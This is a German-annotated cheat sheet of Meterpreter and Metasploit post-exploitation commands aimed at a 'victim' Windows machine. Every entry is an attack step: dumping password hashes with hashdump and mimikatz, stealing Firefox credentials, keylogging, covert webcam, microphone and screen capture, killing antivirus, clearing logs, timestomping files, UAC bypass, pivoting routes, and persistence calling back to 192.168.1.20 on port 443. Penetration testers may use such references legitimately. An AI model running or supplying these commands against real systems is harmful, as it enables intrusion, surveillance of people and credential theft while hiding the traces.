show options (Parameter anzeigen) sessions -l (Sessions auflisten) sessions -i 2 (Session 2 als aktive Session holen) sessions -c ifconfig (Befehl auf allen offenen Sessions ausführen) sessions -s credcollect (Script auf allen Metapreter Sessions ausführen) screenshot back getuid (Systemrechte anzeigen) sysinfo background (Session in den Hintergrund bringen) upload /root/.rnd C:\\windows\\system32 timestomp .rnd -z "07/14/2009 02:16:00" clearev (Logdateien löschen) getprivs (Einige Rechte anfordern) use priv getsystem (Adminrechte erlangen) search uac (Exploits um UAC zu umgehen auflisten) screenshot (Screenshot machen) use espia screengrab bgrun keylogrecorder (Keylogger im Hintergrund starten) run post/windows/capture/keylog_recorder (Keylogger neue Methode) kill 0 (Background Job 0 beenden) jobs (Background Jobs anzeigen) keyscan_start (Neuer Keylogger starten) keyscan_dump run hashdump (SAM Datei mit Accounts und Passwörtern auslesen) run winenum (Informationen über Victim sammeln IP, Accounts usw.) run winenum -m -r -c (Getarntes Informationen sammeln) run killav (Virenscanner beenden) run post/windows/gather/win_privs (Systemrechte anzeigen) run persistence -U -i 5 -p 443 -r 192.168.1.20 (Dauerhafte Meterpretersession) run autoroute -s 10.1.13.0/24 (Fügt Rute zu 10.1.13.0 hinzu) route add 192.168.1.0 255.255.255.0 1 (Routet traffic durch Meterpreter für das angegebene Netzwerk und Meterpreter Session 1, nicht in der Session sondern in Metasploit starten) route print (Eingebene Routes anzeigen) bgrun screenspy -h : to display the help banner. (Stürzt immer ab) -d : The delay in seconds between each screen shot. By default 3 seconds. -t : The time, in second, for the screenspy execution. By default 10 seconds. -s : The targeted system, linux or windows. By default linux. (Victim Desktop) run post/windows/gather/screen_spy (Macht 5 Screenshots mit einem abstand von 5 Sekunden) display BildName (Bilder aus der Shell öffnen) run duplicate -r 192.168.1.20 -p 443 (Läuft nicht gut) migrate PID (In Prozess Injecten) execute -f Programmname.exe (Programm starten) execute -H -m -d calc.exe f pentest/windows-binarys/tools/klogger.exe (Datei im Speicher ausführen) webcam_list (Webcams auflisten) webcam_snap (Einzelnes Bild der Webcam) run webcam (Videofeed von Webcam) webcam_stream (Stream von Webcam anzeigen) record_mic -d 10 (10 Sekunden vom Microfon aufnehmen) (bringt den Client oft zum Absturtz) run checkvm (Prüfen ob das Victim eine virtuelle Maschine ist) run getcountermeasure (Sucht Antiviren und Firewall Prozesse) run post/windows/gather/enum_applications (Installierte Programme auflisten) run post/windows/gather/hashdump (Windows Hashes auslesen) run arp_scanner -r 192.168.180.0/24 (Computer im Netzwerk suchen) getuid (Berechtigungsstufe anzeigen) show_mount (Laufwerke auflisten) edit edit.txt (Datei Öffnen) search -f boot.ini (Datei auf Festplatte suchen) idletime (Zeit die der Benutzer inaktiv ist anzeigen) search exploit/windows/local (Persistence Optionen anzeigen) search UAC (Windows Rechte erweitern exploits) search type:exploit name:Microsoft (Nach Exploits für Windows suchen) search platform:windows reverse_tcp (Nach allen Windows Reverse TCP Payloads suchen) show payloads (Mögliche Payloads für Exploit anzeigen) show targets (Mögliche Zeile anzeigen) reg enumkey -k HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run (Autostart anzeigen) reg queryval -k HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v OneDrive (Wert von Schlüssel OneDrive anzeigen) getpid (Aktuelle Prozess ID anzeigen) ps -S explorer.exe (Prozess explorer.exe suchen) sysinfo (Informationen über Betriebssystem und Meterpreter Prozess anzeigen) load mimikatz (Modul für Windows Passwörter laden) mimikatz_command -f samdump::hashes (Passwort Hashes anzeigen) msv (Zeigt Passswort Hashes) kerberos (Windows Passwörter cracken vorher in Prozess des Systems injecten) set verbose true (Mehr Meldungen zu exploit) check (Von Exploit Modul starten prüft ob das Ziel verwundbar für das Exploit ist) post/multi/gather/firefox_creds (firefox credentials sammeln) search -f *.jpg (durchuscht alle Festplatten nach *.jpg) pwd (Aktuelles Verzeichnis anzeigen) lpwd (Lokales Verzeichnis auf angreifenden Computer anzeigen) run vnc (VNC Verbindung öffnen um den Desktop des Victems zu sehen) vncviewer (OpenSuse VNC Viewer)